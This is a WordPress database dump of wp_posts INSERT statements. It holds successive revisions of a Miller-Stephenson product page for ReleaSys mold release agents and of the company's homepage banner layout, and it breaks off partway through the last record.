INSERT INTO `wp_posts` VALUES (526, 3, '2016-08-18 19:24:27', '2016-08-18 19:24:27', '[row]\r\n\r\n[col span="1/2"]\r\n\r\n[ux_banner height="600px" bg="523" text_color="light" animated="fadeIn" text_width="45%" text_align="left" text_pos="far-right center" parallax="0" parallax_text="0"]\r\n<h4 class="alt-font "><strong>Semi-Permanent Mold Release</strong></h4>\r\n<h1>ReleaSys</h1>\r\nMiller-Stephenson Exclusive Product\r\n\r\n<a class="button alt-button white" title="" href="#">ReleaSys Product Line</a>\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/2"]\r\n<h3>ReleaSys Semi-Permanent Mold Release</h3>\r\nMiller-Stephenson\'s exclusive mold release system, ReleaSys is backed by more than 40 years of research and development experience.  ReleaSys was developed to be the most technological advanced release system on the market capable of releasing the most complex materials in the most demanding molding operations.  Miller-Stephenson has developed ReleaSys formulations to be applicable in virtually all types of composites and rubber molding process.  Customers who implement ReleaSys into their molding operations can expect the following benefits:\r\n<ul>\r\n 	<li>Cost-Effective, Efficient Release</li>\r\n 	<li>Lower rejection rates and Higher quality parts</li>\r\n 	<li>Superior Durability and Surface Adhesion</li>\r\n 	<li>Low Levels of Mold Fouling</li>\r\n 	<li>Minimized transfer</li>\r\n</ul>\r\n[/col]\r\n\r\n[/row]\r\n\r\n[/ux_banner]', '', '', 'inherit', 'closed', 'closed', '', '455-revision-v1', '', '', '2016-08-18 19:24:27', '2016-08-18 19:24:27', '', 455, 'https://132.148.10.86/wordpress/455-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (528, 1, '2016-08-18 19:34:53', '2016-08-18 19:34:53', '[row]\r\n\r\n[col span="1/2"]\r\n\r\n[ux_banner height="600px" bg="523" text_color="light" animated="fadeIn" text_width="45%" text_align="left" text_pos="far-right center" parallax="0" parallax_text="0"]\r\n<h4 class="alt-font "><strong>Semi-Permanent Mold Release</strong></h4>\r\n<h1>ReleaSys</h1>\r\nMiller-Stephenson Exclusive Product\r\n\r\n<a class="button alt-button white" title="" href="product-category/release-agents/semi-permanent/">ReleaSys Product Line</a>\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/2"]\r\n<h3>ReleaSys Semi-Permanent Mold Release</h3>\r\nMiller-Stephenson\'s exclusive mold release system, ReleaSys is backed by more than 40 years of research and development experience.  ReleaSys was developed to be the most technological advanced release system on the market capable of releasing the most complex materials in the most demanding molding operations.  Miller-Stephenson has developed ReleaSys formulations to be applicable in virtually all types of composites and rubber molding process.  Customers who implement ReleaSys into their molding operations can expect the following benefits:\r\n<ul>\r\n 	<li>Cost-Effective, Efficient Release</li>\r\n 	<li>Lower rejection rates and Higher quality parts</li>\r\n 	<li>Superior Durability and Surface Adhesion</li>\r\n 	<li>Low Levels of Mold Fouling</li>\r\n 	<li>Minimized transfer</li>\r\n</ul>\r\n[/col]\r\n\r\n[/row]\r\n\r\n', '', '', 'inherit', 'closed', 'closed', '', '455-revision-v1', '', '', '2016-08-18 19:34:53', '2016-08-18 19:34:53', '', 455, 'https://132.148.10.86/wordpress/455-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (529, 1, '2016-08-18 19:35:25', '2016-08-18 19:35:25', '[row]\r\n\r\n[col span="1/2"]\r\n\r\n[ux_banner height="600px" bg="523" text_color="light" animated="fadeIn" text_width="45%" text_align="left" text_pos="far-right center" parallax="0" parallax_text="0"]\r\n<h4 class="alt-font "><strong>Semi-Permanent Mold Release</strong></h4>\r\n<h1>ReleaSys</h1>\r\nMiller-Stephenson Exclusive Product\r\n\r\n<a class="button alt-button white" title="" href="../product-category/release-agents/semi-permanent/">ReleaSys Product Line</a>\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/2"]\r\n<h3>ReleaSys Semi-Permanent Mold Release</h3>\r\nMiller-Stephenson\'s exclusive mold release system, ReleaSys is backed by more than 40 years of research and development experience.  ReleaSys was developed to be the most technological advanced release system on the market capable of releasing the most complex materials in the most demanding molding operations.  Miller-Stephenson has developed ReleaSys formulations to be applicable in virtually all types of composites and rubber molding process.  Customers who implement ReleaSys into their molding operations can expect the following benefits:\r\n<ul>\r\n 	<li>Cost-Effective, Efficient Release</li>\r\n 	<li>Lower rejection rates and Higher quality parts</li>\r\n 	<li>Superior Durability and Surface Adhesion</li>\r\n 	<li>Low Levels of Mold Fouling</li>\r\n 	<li>Minimized transfer</li>\r\n</ul>\r\n[/col]\r\n\r\n[/row]\r\n\r\n', '', '', 'inherit', 'closed', 'closed', '', '455-revision-v1', '', '', '2016-08-18 19:35:25', '2016-08-18 19:35:25', '', 455, 'https://132.148.10.86/wordpress/455-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (530, 1, '2016-08-18 19:40:44', '2016-08-18 19:40:44', '[row]\r\n\r\n[col span="1/2"]\r\n\r\n[ux_banner height="600px" bg="523" text_color="light" animated="fadeIn" text_width="45%" text_align="left" text_pos="far-right center" parallax="0" parallax_text="0"]\r\n\r\n<h4 class="alt-font "><strong>Semi-Permanent Mold Release</strong></h4>\r\n<h1>ReleaSys</h1>\r\nMiller-Stephenson Exclusive Product\r\n\r\n<p></p><a class="button alt-button white" title="" href="../product-category/release-agents/semi-permanent/">ReleaSys Product Line</a>\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/2"]\r\n\r\n<h3>ReleaSys Semi-Permanent Mold Release</h3>\r\nMiller-Stephenson\'s exclusive mold release system, ReleaSys is backed by more than 40 years of research and development experience. &nbsp;ReleaSys was developed to be the most technological advanced release system on the market capable of releasing the most complex materials in the most demanding molding operations. &nbsp;Miller-Stephenson has developed ReleaSys formulations to be applicable in virtually all types of composites and rubber molding process. &nbsp;Customers who implement ReleaSys into their molding operations can expect the following benefits:\r\n<ul>\r\n 	<li>Cost-Effective, Efficient Release</li>\r\n 	<li>Lower rejection rates and Higher quality parts</li>\r\n 	<li>Superior Durability and Surface Adhesion</li>\r\n 	<li>Low Levels of Mold Fouling</li>\r\n 	<li>Minimized transfer</li>\r\n</ul>\r\n[button text="Download ReleaSys Product Guide" link="/wp-content/uploads/2016/08/ReleaSys-Product-Guide.pdf"]\r\n\r\n[/col]\r\n\r\n[/row]', '', '', 'inherit', 'closed', 'closed', '', '455-revision-v1', '', '', '2016-08-18 19:40:44', '2016-08-18 19:40:44', '', 455, 'https://132.148.10.86/wordpress/455-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (531, 1, '2016-08-18 19:42:45', '2016-08-18 19:42:45', '[row]\r\n\r\n[col span="1/2"]\r\n\r\n[ux_banner height="600px" bg="523" text_color="light" animated="fadeIn" text_width="45%" text_align="left" text_pos="far-right center" parallax="0" parallax_text="0"]\r\n\r\n<h4 class="alt-font "><strong>Semi-Permanent Mold Release</strong></h4>\r\n<h1>ReleaSys</h1>\r\nMiller-Stephenson Exclusive Product\r\n\r\n<p></p><p></p><a class="button alt-button white" title="" href="../product-category/release-agents/semi-permanent/">ReleaSys Product Line</a>\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/2"]\r\n\r\n<h3>ReleaSys Semi-Permanent Mold Release</h3>\r\nMiller-Stephenson\'s exclusive mold release system, ReleaSys is backed by more than 40 years of research and development experience. &nbsp;ReleaSys was developed to be the most technological advanced release system on the market capable of releasing the most complex materials in the most demanding molding operations. &nbsp;Miller-Stephenson has developed ReleaSys formulations to be applicable in virtually all types of composites and rubber molding process. &nbsp;Customers who implement ReleaSys into their molding operations can expect the following benefits:\r\n<ul>\r\n 	<li>Cost-Effective, Efficient Release</li>\r\n 	<li>Lower rejection rates and Higher quality parts</li>\r\n 	<li>Superior Durability and Surface Adhesion</li>\r\n 	<li>Low Levels of Mold Fouling</li>\r\n 	<li>Minimized transfer</li>\r\n</ul>\r\n[button text="Download ReleaSys Product Guide" link="<input autocomplete="off" name="value" style="width: 300px; height: 16px;">"]\r\n\r\n[/col]\r\n\r\n[/row]', 'ReleaSys Introduction', '', 'inherit', 'closed', 'closed', '', '455-revision-v1', '', '', '2016-08-18 19:42:45', '2016-08-18 19:42:45', '', 455, 'https://132.148.10.86/wordpress/455-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (532, 1, '2016-09-30 11:38:41', '2016-09-30 11:38:41', '[row]\n\n[col span="6"]\n\n[ux_banner height="600px" bg="523" link="https://www.miller-stephenson.com/chemicals/release-agents/semi-permanent/"]\n\n[text_box width="45" width__sm="60" scale="123" animate="fadeIn" position_x="100" position_y="20" text_align="left"]\n\n[title style="center" text="Semi-Permanent Mold Release" size="88"]\n<h1><strong>Water Based Release Agenet - ReleaSys</strong></h1>\n<strong><em>Miller-Stephenson Exclusive Product</em></strong><a class="button alt-button white" title="" href="../chemicals/release-agents/semi-permanent/">ReleaSys Product Line</a>\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="6"]\n<h3>ReleaSys Semi-Permanent Mold Release</h3>\nMiller-Stephenson\'s exclusive mold release system, ReleaSys Release Agent is backed by more than 40 years of research and development experience.  ReleaSys was developed to be the most technological advanced release system on the market capable of releasing the most complex materials in the most demanding molding operations.  Miller-Stephenson has developed ReleaSys formulations to be applicable in virtually all types of composites and rubber molding process.  Customers who implement ReleaSys into their molding operations can expect the following benefits:\n<ul>\n 	<li>Cost-Effective, Efficient Release</li>\n 	<li>Lower rejection rates and Higher quality parts</li>\n 	<li>Superior Durability and Surface Adhesion</li>\n 	<li>Low Levels of Mold Fouling</li>\n 	<li>Minimized transfer</li>\n</ul>\n[button text="Download ReleaSys Product Guide" style="primary" link="../wp-content/uploads/2016/08/ReleaSys-Product-Guide.pdf"]\n\n[/col]\n\n[/row]', 'ReleaSys Introduction', '', 'inherit', 'closed', 'closed', '', '455-autosave-v1', '', '', '2016-09-30 11:38:41', '2016-09-30 11:38:41', '', 455, 'https://132.148.10.86/wordpress/455-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (533, 1, '2016-08-18 19:44:49', '2016-08-18 19:44:49', '[row]\r\n\r\n[col span="1/2"]\r\n\r\n[ux_banner height="600px" bg="523" text_color="light" animated="fadeIn" text_width="45%" text_align="left" text_pos="far-right center" parallax="0" parallax_text="0"]\r\n\r\n<h4 class="alt-font "><strong>Semi-Permanent Mold Release</strong></h4>\r\n<h1>ReleaSys</h1>\r\nMiller-Stephenson Exclusive Product\r\n\r\n<p></p><p></p><p></p><a class="button alt-button white" title="" href="../product-category/release-agents/semi-permanent/">ReleaSys Product Line</a>\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/2"]\r\n\r\n<h3>ReleaSys Semi-Permanent Mold Release</h3>\r\nMiller-Stephenson\'s exclusive mold release system, ReleaSys is backed by more than 40 years of research and development experience. &nbsp;ReleaSys was developed to be the most technological advanced release system on the market capable of releasing the most complex materials in the most demanding molding operations. &nbsp;Miller-Stephenson has developed ReleaSys formulations to be applicable in virtually all types of composites and rubber molding process. &nbsp;Customers who implement ReleaSys into their molding operations can expect the following benefits:\r\n<ul>\r\n 	<li>Cost-Effective, Efficient Release</li>\r\n 	<li>Lower rejection rates and Higher quality parts</li>\r\n 	<li>Superior Durability and Surface Adhesion</li>\r\n 	<li>Low Levels of Mold Fouling</li>\r\n 	<li>Minimized transfer</li>\r\n</ul>\r\n[button text="Download ReleaSys Product Guide" link="wp-content/uploads/2016/08/ReleaSys-Product-Guide.pdf"]\r\n\r\n[/col]\r\n\r\n[/row]', 'ReleaSys Introduction', '', 'inherit', 'closed', 'closed', '', '455-revision-v1', '', '', '2016-08-18 19:44:49', '2016-08-18 19:44:49', '', 455, 'https://132.148.10.86/wordpress/455-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (534, 1, '2016-08-18 19:45:32', '2016-08-18 19:45:32', '[row]\r\n\r\n[col span="1/2"]\r\n\r\n[ux_banner height="600px" bg="523" text_color="light" animated="fadeIn" text_width="45%" text_align="left" text_pos="far-right center" parallax="0" parallax_text="0"]\r\n\r\n<h4 class="alt-font "><strong>Semi-Permanent Mold Release</strong></h4>\r\n<h1>ReleaSys</h1>\r\nMiller-Stephenson Exclusive Product\r\n\r\n<p></p><p></p><p></p><a class="button alt-button white" title="" href="../product-category/release-agents/semi-permanent/">ReleaSys Product Line</a>\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/2"]\r\n\r\n<h3>ReleaSys Semi-Permanent Mold Release</h3>\r\nMiller-Stephenson\'s exclusive mold release system, ReleaSys is backed by more than 40 years of research and development experience. &nbsp;ReleaSys was developed to be the most technological advanced release system on the market capable of releasing the most complex materials in the most demanding molding operations. &nbsp;Miller-Stephenson has developed ReleaSys formulations to be applicable in virtually all types of composites and rubber molding process. &nbsp;Customers who implement ReleaSys into their molding operations can expect the following benefits:\r\n<ul>\r\n 	<li>Cost-Effective, Efficient Release</li>\r\n 	<li>Lower rejection rates and Higher quality parts</li>\r\n 	<li>Superior Durability and Surface Adhesion</li>\r\n 	<li>Low Levels of Mold Fouling</li>\r\n 	<li>Minimized transfer</li>\r\n</ul>\r\n[button text="Download ReleaSys Product Guide" link="../wp-content/uploads/2016/08/ReleaSys-Product-Guide.pdf"]\r\n\r\n[/col]\r\n\r\n[/row]', 'ReleaSys Introduction', '', 'inherit', 'closed', 'closed', '', '455-revision-v1', '', '', '2016-08-18 19:45:32', '2016-08-18 19:45:32', '', 455, 'https://132.148.10.86/wordpress/455-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (539, 1, '2016-08-18 23:56:16', '2016-08-18 23:56:16', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="150px" text_color="light" text_width="60%" text_bg="#002c56" bg="#002c56"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n<h2 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h2>\r\n[button text="MORE" link="about" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="240px" bg="86" link="product-category/release-agents/" target="_self" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom" excerpt="false"]\r\n\r\n[button size="medium" style="primary" text="RELEASE AGENTS" link="product-category/release-agents/"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" link="product-category/krytox-lubricants/" � animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX™ &amp; LUBRICANTS" link="product-category/krytox-lubricants/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" link="product-category/solvents/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY PRODUCTS &amp; SOLVENTS" link="product-category/solvents/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" link="product-category/conformal-coatings/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="EPOXY &amp; CONFORMAL COATINGS" link="product-category/conformal-coatings/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="233" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL CHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" link="product-category/vazo/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO RADICAL INITIATORS" link="product-category/vazo/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n[row]\r\n\r\n[col span="5/6" align="center"]\r\n\r\n[message_box bg="#FFFFFF" text_color="dark"]\r\n<p style="text-align: right;">We are committed to providing our clients with superior customer service, delivery, and technical support to ensure successful product applications.</p>\r\n[/message_box]\r\n\r\n[/col]\r\n\r\n[col span="1/6" align="left" padding="0"]\r\n&nbsp;<br/>\r\n[button text="TECH SUPPORT" link="https://" size="normal"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" text_color="light" animated="rotateInUpLeft" text_width="70%" text_align="center" text_pos="center" parallax_text="0" effect="sparkle" hover="zoom"]\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>ReleaSys <strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new semi-permanent mold release agents</h4>\r\n[button text="TELL ME MORE" link="introducing-releasys-our-newest-release-agent/" style="white alt-button"]\r\n\r\n[/ux_banner]\r\n\r\n[gap height="30px"]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-18 23:56:16', '2016-08-18 23:56:16', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (540, 1, '2016-08-18 23:57:23', '2016-08-18 23:57:23', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="150px" text_color="light" text_width="60%" text_bg="#002c56" bg="#002c56"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n<h2 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h2>\r\n[button text="MORE" link="about" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="240px" bg="86" link="product-category/release-agents/" target="_self" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom" excerpt="false"]\r\n\r\n[button text="RELEASE AGENTS" link="product-category/release-agents/" style="primary" size="large"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" link="product-category/krytox-lubricants/" � animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX™ &amp; LUBRICANTS" link="product-category/krytox-lubricants/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" link="product-category/solvents/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY PRODUCTS &amp; SOLVENTS" link="product-category/solvents/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" link="product-category/conformal-coatings/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="EPOXY &amp; CONFORMAL COATINGS" link="product-category/conformal-coatings/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="233" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL CHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" link="product-category/vazo/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO RADICAL INITIATORS" link="product-category/vazo/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n[row]\r\n\r\n[col span="5/6" align="center"]\r\n\r\n[message_box bg="#FFFFFF" text_color="dark"]\r\n\r\n<p style="text-align: right;">We are committed to providing our clients with superior customer service, delivery, and technical support to ensure successful product applications.</p>\r\n\r\n[/message_box]\r\n\r\n[/col]\r\n\r\n[col span="1/6" align="left" padding="0"]\r\n\r\n&nbsp;<br>\r\n[button text="TECH SUPPORT" link="https://" size="normal"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" text_color="light" animated="rotateInUpLeft" text_width="70%" text_align="center" text_pos="center" parallax_text="0" effect="sparkle" hover="zoom"]\r\n\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>ReleaSys&nbsp;<strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new&nbsp;semi-permanent mold release agents</h4>\r\n[button text="TELL ME MORE" link="introducing-releasys-our-newest-release-agent/" style="white alt-button"]\r\n\r\n[/ux_banner]\r\n\r\n[gap height="30px"]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-18 23:57:23', '2016-08-18 23:57:23', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (541, 1, '2016-08-18 23:58:05', '2016-08-18 23:58:05', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="150px" text_color="light" text_width="60%" text_bg="#002c56" bg="#002c56"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n<h2 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h2>\r\n[button text="MORE" link="about" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="240px" bg="86" link="product-category/release-agents/" target="_self" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom" excerpt="false"]\r\n\r\n[button text="RELEASE AGENTS" link="product-category/release-agents/" style="primary"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" link="product-category/krytox-lubricants/" � animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX™ &amp; LUBRICANTS" link="product-category/krytox-lubricants/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" link="product-category/solvents/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY PRODUCTS &amp; SOLVENTS" link="product-category/solvents/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" link="product-category/conformal-coatings/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="EPOXY &amp; CONFORMAL COATINGS" link="product-category/conformal-coatings/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="233" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL CHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" link="product-category/vazo/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO RADICAL INITIATORS" link="product-category/vazo/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n[row]\r\n\r\n[col span="5/6" align="center"]\r\n\r\n[message_box bg="#FFFFFF" text_color="dark"]\r\n\r\n<p style="text-align: right;">We are committed to providing our clients with superior customer service, delivery, and technical support to ensure successful product applications.</p>\r\n\r\n[/message_box]\r\n\r\n[/col]\r\n\r\n[col span="1/6" align="left" padding="0"]\r\n\r\n&nbsp;<br>\r\n[button text="TECH SUPPORT" link="https://" size="normal"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" text_color="light" animated="rotateInUpLeft" text_width="70%" text_align="center" text_pos="center" parallax_text="0" effect="sparkle" hover="zoom"]\r\n\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>ReleaSys&nbsp;<strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new&nbsp;semi-permanent mold release agents</h4>\r\n[button text="TELL ME MORE" link="introducing-releasys-our-newest-release-agent/" style="white alt-button"]\r\n\r\n[/ux_banner]\r\n\r\n[gap height="30px"]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-18 23:58:05', '2016-08-18 23:58:05', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (542, 1, '2016-08-19 00:28:25', '2016-08-19 00:28:25', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="150px" text_color="light" text_width="60%" text_bg="#002c56" bg="#002c56"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n<h2 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h2>\r\n[button text="MORE" link="about" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="240px" bg="86" link="product-category/release-agents/" target="_self" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom" excerpt="false"]\r\n\r\n[button text="RELEASE AGENTS" link="product-category/release-agents/" style="primary"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" link="product-category/krytox-lubricants/" � animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX™<BR>&amp; LUBRICANTS" link="product-category/krytox-lubricants/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" link="product-category/solvents/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY PRODUCTS &amp; SOLVENTS" link="product-category/solvents/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" link="product-category/conformal-coatings/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="EPOXY &amp; CONFORMAL COATINGS" link="product-category/conformal-coatings/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="233" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL CHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" link="product-category/vazo/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO RADICAL INITIATORS" 